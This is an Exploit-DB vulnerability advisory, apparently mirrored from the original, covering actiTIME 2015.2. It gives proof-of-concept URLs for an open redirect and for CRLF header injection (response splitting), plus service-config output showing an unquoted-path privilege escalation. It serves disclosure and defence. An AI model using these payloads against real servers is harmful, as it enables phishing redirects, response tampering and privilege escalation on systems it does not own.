actiTIME 2015.2 – Multiple Vulnerabilities

• Exploit Database
• 41 阅读

• 作者： LiquidWorm
  日期： 2015-11-02
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38602/

• 
  actiTIME 2015.2 Multiple Vulnerabilities
  
  
  Vendor: Actimind, Inc.
  Product web page: http://www.actitime.com
  Affected version: 2015.2 (Small Team Edition)
  
  Summary: actiTIME is a web timesheet software. It allows you to
  enter time spent on different work assignments, register time offs
  and sick leaves, and then create detailed reports covering almost
  any management or accounting needs.
  
  Desc: The application suffers from multiple security vulnerabilities
  including: Open Redirection, HTTP Response Splitting and Unquoted
  Service Path Elevation Of Privilege.
  
  Tested on: OS/Platform:	Windows 7 6.1 for x86
   Servlet Container: Jetty/5.1.4
   Servlet API Version: 2.4
   Java: 1.7.0_76-b13
   Database: MySQL 5.1.72-community-log
   Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
   Patch level: 28.0
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5273
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php
  
  
  13.10.2015
  
  --
  
  
  
  1. Open Redirect
  -----------------
  
  http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1
  
  
  2. HTTP Response Splitting
  ---------------------------
  
  http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1
  
  Response:
  
  HTTP/1.1 302 Moved Temporarily
  Date: Wed, 14 Oct 2015 09:32:05 GMT
  Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
  Content-Type: text/html;charset=UTF-8
  Cache-Control: no-store, no-cache
  Pragma: no-cache
  Expires: Tue, 09 Sep 2014 09:32:05 GMT
  X-UA-Compatible: IE=Edge
  Location: http://localhost/administration/
  Server: Waddup/2.0
  Content-Length: 0
  
  
  3. Unquoted Service Path Elevation Of Privilege
  ------------------------------------------------
  
  C:\Users\joxy>sc qc actiTIME
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: actiTIME
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : actiTIME Server
  DEPENDENCIES : actiTIME MySQL
  SERVICE_START_NAME : LocalSystem